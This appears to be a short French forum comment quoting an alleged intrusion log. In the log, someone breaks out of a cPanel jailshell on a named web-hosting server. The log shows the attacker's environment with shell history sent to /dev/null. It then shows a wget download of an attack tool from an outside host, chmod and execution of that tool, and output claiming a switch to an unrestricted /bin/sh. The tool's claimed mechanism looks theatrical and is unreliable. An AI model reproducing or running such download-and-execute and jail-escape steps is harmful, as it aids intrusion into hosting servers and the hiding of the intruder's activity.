Si c'est vrai, j'ai bien aimé cette partie :
sh-3.1$ env
MANPATH=/usr/lib/courier-imap/man:
HOSTNAME=srv01.webhostline.com
SHELL=/usr/local/cpanel/bin/jailshell
TERM=xterm
HISTSIZE=1000
SSH_CLIENT=13.33.33.37 35154 2222
SSH_TTY=/dev/pts/1
USER=crownvip
MAIL=/var/spool/mail/infosec
PWD=/home/crownvip
INPUTRC=/etc/inputrc
JAVA_HOME=/usr/local/jdk
EDITOR=pico
LANG=en_US.UTF-8
HOME=/home/crownvip
SHLVL=4
LS_OPTIONS=--color=tty -F -a -b -T 0
LOGNAME=crownvip
CVS_RSH=ssh
VISUAL=pico
SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222
CLASSPATH=.:/usr/local/jdk/lib/classes.zip
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
_=/usr/bin/env
// Awww, jailshell...
sh-3.1$ wget http://anti.sec.labs/MichaelScofield
--13:33:37-- http://anti.sec.labs/MichaelScofield
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4921 (4.8K) [text/plain]
Saving to: `MichaelScofield'
100%[=========================================================================================================================================>] 4,921 --.-K/s in 0.08s
11:27:57 (64.0 KB/s) - `MichaelScofield' saved [4921/4921]
sh-3.1$ chmod +x MichaelScofield
sh-3.1$ ./MichaelScofield
[+] MichaelScofield - Prison Breaker / anti-sec group
[+] Grabbing environment variables...
SHELL=/usr/local/cpanel/bin/jailshell
[+] Injecting new shell..
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
SHELL=/bin/sh
sh-3.1$ env
MANPATH=/usr/lib/courier-imap/man:
HOSTNAME=srv01.webhostline.com
SHELL=/bin/sh
TERM=xterm
HISTSIZE=1000
SSH_CLIENT=13.33.33.37 35154 2222
SSH_TTY=/dev/pts/1
USER=crownvip
MAIL=/var/spool/mail/infosec
PWD=/home/crownvip
INPUTRC=/etc/inputrc
JAVA_HOME=/usr/local/jdk
EDITOR=pico
LANG=en_US.UTF-8
HOME=/home/crownvip
SHLVL=4
LS_OPTIONS=--color=tty -F -a -b -T 0
LOGNAME=crownvip
CVS_RSH=ssh
VISUAL=pico
SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222
CLASSPATH=.:/usr/local/jdk/lib/classes.zip
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
_=/usr/bin/env
// Prison Break FTW.